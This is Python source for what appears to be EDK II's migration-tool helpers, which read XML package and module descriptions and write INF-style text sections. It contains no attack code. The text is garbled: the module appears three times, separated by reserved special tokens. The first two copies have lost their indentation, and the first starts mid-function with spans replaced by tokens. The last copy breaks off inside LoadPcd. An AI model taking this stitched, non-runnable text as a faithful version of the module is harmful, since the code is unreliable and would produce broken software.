XmlTag = XmlParentTag + '/' + 'GuidValue'
CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'Version'
CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
CommonHeader.FileName = os.path.basename(FileName)
CommonHeader.FullPath = os.path.abspath(FileName)
<|reserved_special_token_0|>
def AddToSpecificationDict(SpecificationDict, SpecificationString):
"""Abstract specification name, value pair from Specification String"""
for SpecificationMatch in mReSpecification.finditer(SpecificationString):
Specification = SpecificationMatch.group('Specification')
Value = SpecificationMatch.group('Value')
SpecificationDict[Specification] = Value
def SetCommonHeader(CommonHeader, XmlCommonHeader):
"""Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
XmlParent = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParent + '/' + 'Abstract'
CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Description'
CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Copyright'
CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'License'
CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Specification'
Specification = XmlElement(XmlCommonHeader, XmlTag)
AddToSpecificationDict(CommonHeader.Specification, Specification)
XmlTag = XmlParent + '/' + 'ModuleType'
CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)
def LoadClonedRecord(XmlCloned):
ClonedRecord = ClonedRecordClass()
XmlTag = 'Id'
ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
XmlTag = 'FarGuid'
ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageGuid'
ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageVersion'
ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleGuid'
ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleVersion'
ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
XmlTag = 'Name'
GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
if XmlParent == 'Entry':
XmlTag = '%s/C_Name' % XmlParent
elif XmlParent == 'GuidCNames':
XmlTag = '%s/GuidCName' % XmlParent
else:
XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
XmlTag = XmlParent + '/' + 'GuidValue'
GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
if XmlParent.endswith('Notify'):
GuidProtocolPpiCommon.Notify = True
XmlTag = 'GuidTypeList'
GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.SupModuleList = SupModules.split()
SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = 'PcdEntry/C_Name'
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/Token'
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/TokenSpaceGuidCName'
Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DatumType'
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/MaxDatumSize'
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DefaultValue'
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdItemType'
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/ValidUsage'
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = 'SupModuleList'
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
def LoadLibraryClass(XmlLibraryClass):
LibraryClass = LibraryClassClass()
XmlTag = 'LibraryClass/Keyword'
LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)
if LibraryClass.LibraryClass == '':
XmlTag = 'Name'
LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)
XmlTag = 'LibraryClass/IncludeHeader'
LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)
XmlTag = 'RecommendedInstanceVersion'
RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion
XmlTag = 'RecommendedInstanceGuid'
RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.SupModuleList = SupModules.split()
SetCommon(LibraryClass, XmlLibraryClass)
return LibraryClass
def LoadBuildOption(XmlBuildOption):
"""Return a new BuildOptionClass object equivalent to XmlBuildOption"""
BuildOption = BuildOptionClass()
BuildOption.Option = XmlElementData(XmlBuildOption)
XmlTag = 'BuildTargets'
BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()
XmlTag = 'ToolChainFamily'
BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'TagName'
BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'ToolCode'
BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'SupArchList'
BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()
return BuildOption
def LoadUserExtensions(XmlUserExtensions):
UserExtensions = UserExtensionsClass()
XmlTag = 'UserID'
UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)
XmlTag = 'Identifier'
UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)
UserExtensions.Content = XmlElementData(XmlUserExtensions)
return UserExtensions
def StoreTextFile(TextFile, Content):
EdkLogger.verbose(Content)
TextFile.write(Content)
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
def GetSection(SectionName, Method, ObjectList):
SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']
SectionDict = {}
for Object in ObjectList:
Item = Method(Object)
if Item == '':
continue
Item = ' %s' % Item
Arches = Object.SupArchList
if len(Arches) == 0:
AddToSection(SectionDict, 'common', Item)
else:
for Arch in SupportedArches:
if Arch.upper() in Arches:
AddToSection(SectionDict, Arch, Item)
Section = ''
for Arch in SupportedArches:
SectionArch = '\n'.join(SectionDict.get(Arch, []))
if SectionArch != '':
Section += '[%s.%s]\n%s\n' % (SectionName, Arch, SectionArch)
Section += '\n'
if Section != '':
Section += '\n'
return Section
def StoreHeader(TextFile, CommonHeader):
CopyRight = CommonHeader.Copyright
Abstract = CommonHeader.Abstract
Description = CommonHeader.Description
License = CommonHeader.License
Header = '#/** @file\n#\n'
Header += '# ' + Abstract + '\n#\n'
Header += '# ' + Description.strip().replace('\n', '\n# ') + '\n'
Header += '# ' + CopyRight + '\n#\n'
Header += '# ' + License.replace('\n', '\n# ').replace(' ', ' ')
Header += '\n#\n#**/\n\n'
StoreTextFile(TextFile, Header)
def StoreDefinesSection(TextFile, DefinesTupleList):
Section = '[Defines]\n'
for DefineItem in DefinesTupleList:
Section += ' %-30s = %s\n' % DefineItem
Section += '\n\n'
StoreTextFile(TextFile, Section)
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return '[UserExtensions.%s.%s]\n %s\n\n' % (UserId, Identifier, Content)
<|reserved_special_token_0|>
def GetTextFileInfo(FileName, TagTuple):
ValueTuple = [''] * len(TagTuple)
try:
for Line in open(FileName):
Line = Line.split('#', 1)[0]
MatchEquation = mReEquation.match(Line)
if MatchEquation:
Tag = MatchEquation.group(1).upper()
Value = MatchEquation.group(2)
for Index in range(len(TagTuple)):
if TagTuple[Index] == Tag:
ValueTuple[Index] = Value
except:
EdkLogger.info('IO Error in reading file %s' % FileName)
return ValueTuple
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
Version = '%s Version %.2f' % (ToolName, VersionNumber)
Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
Parser = OptionParser(description=Copyright, version=Version, usage=
UsageString)
Parser.add_option('-o', '--output', dest='OutputFile', help=
'The name of the %s file to be created.' % Destinate)
Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
default=False, help=
'Automatically create the %s file using the name of the %s file and replacing file extension'
% (Source, Destinate))
Parser.add_option('-q', '--quiet', action='store_true', type=None, help
='Disable all messages except FATAL ERRORS.')
Parser.add_option('-v', '--verbose', action='store_true', type=None,
help='Turn on verbose output with informational messages printed.')
Options, Args = Parser.parse_args()
if Options.verbose:
EdkLogger.setLevel(EdkLogger.VERBOSE)
elif Options.quiet:
EdkLogger.setLevel(EdkLogger.QUIET)
else:
EdkLogger.setLevel(EdkLogger.INFO)
if len(Args) == 0:
raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
Parser.get_usage())
if len(Args) > 1:
raise MigrationError(PARAMETER_INVALID, name='Too many input files',
usage=Parser.get_usage())
InputFile = Args[0]
if not os.path.exists(InputFile):
raise MigrationError(FILE_NOT_FOUND, name=InputFile)
if Options.OutputFile:
if Options.AutoWrite:
raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
usage=Parser.get_usage())
elif Options.AutoWrite:
Options.OutputFile = os.path.splitext(InputFile)[0
] + '.' + Destinate.lower()
else:
raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
get_usage())
return Options, InputFile
if __name__ == '__main__':
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
XmlTag = 'Usage'
Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = 'FeatureFlag'
Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
XmlTag = 'SupArchList'
Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
Common.HelpText = XmlElement(XmlCommon, XmlTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
XmlParentTag = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParentTag + '/' + NameTag
CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'GuidValue'
CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'Version'
CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
CommonHeader.FileName = os.path.basename(FileName)
CommonHeader.FullPath = os.path.abspath(FileName)
mReSpecification = re.compile('(?P<Specification>\\w+)\\s+(?P<Value>\\w*)')
def AddToSpecificationDict(SpecificationDict, SpecificationString):
"""Abstract specification name, value pair from Specification String"""
for SpecificationMatch in mReSpecification.finditer(SpecificationString):
Specification = SpecificationMatch.group('Specification')
Value = SpecificationMatch.group('Value')
SpecificationDict[Specification] = Value
def SetCommonHeader(CommonHeader, XmlCommonHeader):
"""Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
XmlParent = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParent + '/' + 'Abstract'
CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Description'
CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Copyright'
CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'License'
CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Specification'
Specification = XmlElement(XmlCommonHeader, XmlTag)
AddToSpecificationDict(CommonHeader.Specification, Specification)
XmlTag = XmlParent + '/' + 'ModuleType'
CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)
def LoadClonedRecord(XmlCloned):
ClonedRecord = ClonedRecordClass()
XmlTag = 'Id'
ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
XmlTag = 'FarGuid'
ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageGuid'
ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageVersion'
ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleGuid'
ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleVersion'
ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
XmlTag = 'Name'
GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
if XmlParent == 'Entry':
XmlTag = '%s/C_Name' % XmlParent
elif XmlParent == 'GuidCNames':
XmlTag = '%s/GuidCName' % XmlParent
else:
XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
XmlTag = XmlParent + '/' + 'GuidValue'
GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
if XmlParent.endswith('Notify'):
GuidProtocolPpiCommon.Notify = True
XmlTag = 'GuidTypeList'
GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.SupModuleList = SupModules.split()
SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = 'PcdEntry/C_Name'
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/Token'
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/TokenSpaceGuidCName'
Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DatumType'
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/MaxDatumSize'
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DefaultValue'
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdItemType'
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/ValidUsage'
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = 'SupModuleList'
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
def LoadLibraryClass(XmlLibraryClass):
LibraryClass = LibraryClassClass()
XmlTag = 'LibraryClass/Keyword'
LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)
if LibraryClass.LibraryClass == '':
XmlTag = 'Name'
LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)
XmlTag = 'LibraryClass/IncludeHeader'
LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)
XmlTag = 'RecommendedInstanceVersion'
RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion
XmlTag = 'RecommendedInstanceGuid'
RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.SupModuleList = SupModules.split()
SetCommon(LibraryClass, XmlLibraryClass)
return LibraryClass
def LoadBuildOption(XmlBuildOption):
"""Return a new BuildOptionClass object equivalent to XmlBuildOption"""
BuildOption = BuildOptionClass()
BuildOption.Option = XmlElementData(XmlBuildOption)
XmlTag = 'BuildTargets'
BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()
XmlTag = 'ToolChainFamily'
BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'TagName'
BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'ToolCode'
BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'SupArchList'
BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()
return BuildOption
def LoadUserExtensions(XmlUserExtensions):
UserExtensions = UserExtensionsClass()
XmlTag = 'UserID'
UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)
XmlTag = 'Identifier'
UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)
UserExtensions.Content = XmlElementData(XmlUserExtensions)
return UserExtensions
def StoreTextFile(TextFile, Content):
EdkLogger.verbose(Content)
TextFile.write(Content)
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
def GetSection(SectionName, Method, ObjectList):
SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']
SectionDict = {}
for Object in ObjectList:
Item = Method(Object)
if Item == '':
continue
Item = ' %s' % Item
Arches = Object.SupArchList
if len(Arches) == 0:
AddToSection(SectionDict, 'common', Item)
else:
for Arch in SupportedArches:
if Arch.upper() in Arches:
AddToSection(SectionDict, Arch, Item)
Section = ''
for Arch in SupportedArches:
SectionArch = '\n'.join(SectionDict.get(Arch, []))
if SectionArch != '':
Section += '[%s.%s]\n%s\n' % (SectionName, Arch, SectionArch)
Section += '\n'
if Section != '':
Section += '\n'
return Section
def StoreHeader(TextFile, CommonHeader):
CopyRight = CommonHeader.Copyright
Abstract = CommonHeader.Abstract
Description = CommonHeader.Description
License = CommonHeader.License
Header = '#/** @file\n#\n'
Header += '# ' + Abstract + '\n#\n'
Header += '# ' + Description.strip().replace('\n', '\n# ') + '\n'
Header += '# ' + CopyRight + '\n#\n'
Header += '# ' + License.replace('\n', '\n# ').replace(' ', ' ')
Header += '\n#\n#**/\n\n'
StoreTextFile(TextFile, Header)
def StoreDefinesSection(TextFile, DefinesTupleList):
Section = '[Defines]\n'
for DefineItem in DefinesTupleList:
Section += ' %-30s = %s\n' % DefineItem
Section += '\n\n'
StoreTextFile(TextFile, Section)
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return '[UserExtensions.%s.%s]\n %s\n\n' % (UserId, Identifier, Content)
mReEquation = re.compile('\\s*(\\S+)\\s*=\\s*(\\S*)\\s*')
def GetTextFileInfo(FileName, TagTuple):
ValueTuple = [''] * len(TagTuple)
try:
for Line in open(FileName):
Line = Line.split('#', 1)[0]
MatchEquation = mReEquation.match(Line)
if MatchEquation:
Tag = MatchEquation.group(1).upper()
Value = MatchEquation.group(2)
for Index in range(len(TagTuple)):
if TagTuple[Index] == Tag:
ValueTuple[Index] = Value
except:
EdkLogger.info('IO Error in reading file %s' % FileName)
return ValueTuple
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
Version = '%s Version %.2f' % (ToolName, VersionNumber)
Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
Parser = OptionParser(description=Copyright, version=Version, usage=
UsageString)
Parser.add_option('-o', '--output', dest='OutputFile', help=
'The name of the %s file to be created.' % Destinate)
Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
default=False, help=
'Automatically create the %s file using the name of the %s file and replacing file extension'
% (Source, Destinate))
Parser.add_option('-q', '--quiet', action='store_true', type=None, help
='Disable all messages except FATAL ERRORS.')
Parser.add_option('-v', '--verbose', action='store_true', type=None,
help='Turn on verbose output with informational messages printed.')
Options, Args = Parser.parse_args()
if Options.verbose:
EdkLogger.setLevel(EdkLogger.VERBOSE)
elif Options.quiet:
EdkLogger.setLevel(EdkLogger.QUIET)
else:
EdkLogger.setLevel(EdkLogger.INFO)
if len(Args) == 0:
raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
Parser.get_usage())
if len(Args) > 1:
raise MigrationError(PARAMETER_INVALID, name='Too many input files',
usage=Parser.get_usage())
InputFile = Args[0]
if not os.path.exists(InputFile):
raise MigrationError(FILE_NOT_FOUND, name=InputFile)
if Options.OutputFile:
if Options.AutoWrite:
raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
usage=Parser.get_usage())
elif Options.AutoWrite:
Options.OutputFile = os.path.splitext(InputFile)[0
] + '.' + Destinate.lower()
else:
raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
get_usage())
return Options, InputFile
if __name__ == '__main__':
pass
<|reserved_special_token_1|>
## @file
# Contains several utilitities shared by migration tools.
#
# Copyright (c) 2007 - 2014, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import EdkLogger
from optparse import OptionParser
from Common.BuildToolError import *
from XmlRoutines import *
from CommonDataClass.CommonClass import *
from Common.LongFilePathSupport import OpenLongFilePath as open
## Set all fields of CommonClass object.
#
# Set all attributes of CommonClass object from XML Dom object of XmlCommon.
#
# @param Common The destine CommonClass object.
# @param XmlCommon The source XML Dom object.
#
def SetCommon(Common, XmlCommon):
XmlTag = "Usage"
Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = "FeatureFlag"
Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
XmlTag = "SupArchList"
Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = XmlNodeName(XmlCommon) + "/" + "HelpText"
Common.HelpText = XmlElement(XmlCommon, XmlTag)
## Set some fields of CommonHeaderClass object.
#
# Set Name, Guid, FileName and FullPath fields of CommonHeaderClass object from
# XML Dom object of XmlCommonHeader, NameTag and FileName.
#
# @param CommonHeader The destine CommonClass object.
# @param XmlCommonHeader The source XML Dom object.
# @param NameTag The name tag in XML Dom object.
# @param FileName The file name of the XML file.
#
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
XmlParentTag = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParentTag + "/" + NameTag
CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + "/" + "GuidValue"
CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + "/" + "Version"
CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
CommonHeader.FileName = os.path.basename(FileName)
CommonHeader.FullPath = os.path.abspath(FileName)
## Regular expression to match specification and value.
mReSpecification = re.compile(r"(?P<Specification>\w+)\s+(?P<Value>\w*)")
## Add specification to specification dictionary.
#
# Abstract specification name, value pair from Specification String and add them
# to specification dictionary.
#
# @param SpecificationDict The destine Specification dictionary.
# @param SpecificationString The source Specification String from which the
# specification name and value pair is abstracted.
#
def AddToSpecificationDict(SpecificationDict, SpecificationString):
"""Abstract specification name, value pair from Specification String"""
for SpecificationMatch in mReSpecification.finditer(SpecificationString):
Specification = SpecificationMatch.group("Specification")
Value = SpecificationMatch.group("Value")
SpecificationDict[Specification] = Value
## Set all fields of CommonHeaderClass object.
#
# Set all attributes of CommonHeaderClass object from XML Dom object of
# XmlCommonHeader, NameTag and FileName.
#
# @param CommonHeader The destine CommonClass object.
# @param XmlCommonHeader The source XML Dom object.
# @param NameTag The name tag in XML Dom object.
# @param FileName The file name of the XML file.
#
def SetCommonHeader(CommonHeader, XmlCommonHeader):
"""Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
XmlParent = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParent + "/" + "Abstract"
CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + "/" + "Description"
CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + "/" + "Copyright"
CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + "/" + "License"
CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + "/" + "Specification"
Specification = XmlElement(XmlCommonHeader, XmlTag)
AddToSpecificationDict(CommonHeader.Specification, Specification)
XmlTag = XmlParent + "/" + "ModuleType"
CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)
## Load a new Cloned Record class object.
#
# Read an input XML ClonedRecord DOM object and return an object of Cloned Record
# contained in the DOM object.
#
# @param XmlCloned A child XML DOM object in a Common XML DOM.
#
# @retvel ClonedRecord A new Cloned Record object created by XmlCloned.
#
def LoadClonedRecord(XmlCloned):
ClonedRecord = ClonedRecordClass()
XmlTag = "Id"
ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
XmlTag = "FarGuid"
ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
XmlTag = "Cloned/PackageGuid"
ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = "Cloned/PackageVersion"
ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
XmlTag = "Cloned/ModuleGuid"
ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = "Cloned/ModuleVersion"
ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
return ClonedRecord
## Load a new Guid/Protocol/Ppi common class object.
#
# Read an input XML Guid/Protocol/Ppi DOM object and return an object of
# Guid/Protocol/Ppi contained in the DOM object.
#
# @param XmlGuidProtocolPpiCommon A child XML DOM object in a Common XML DOM.
#
# @retvel GuidProtocolPpiCommon A new GuidProtocolPpiCommon class object
# created by XmlGuidProtocolPpiCommon.
#
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
XmlTag = "Name"
GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
if XmlParent == "Entry":
XmlTag = "%s/C_Name" % XmlParent
elif XmlParent == "GuidCNames":
XmlTag = "%s/GuidCName" % XmlParent
else:
XmlTag = "%s/%sCName" % (XmlParent, XmlParent)
GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
XmlTag = XmlParent + "/" + "GuidValue"
GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
if XmlParent.endswith("Notify"):
GuidProtocolPpiCommon.Notify = True
XmlTag = "GuidTypeList"
GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
XmlTag = "SupModuleList"
SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.SupModuleList = SupModules.split()
SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
return GuidProtocolPpiCommon
## Load a new Pcd class object.
#
# Read an input XML Pcd DOM object and return an object of Pcd
# contained in the DOM object.
#
# @param XmlPcd A child XML DOM object in a Common XML DOM.
#
# @retvel Pcd A new Pcd object created by XmlPcd.
#
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = "PcdEntry/C_Name"
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/Token"
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/TokenSpaceGuidCName"
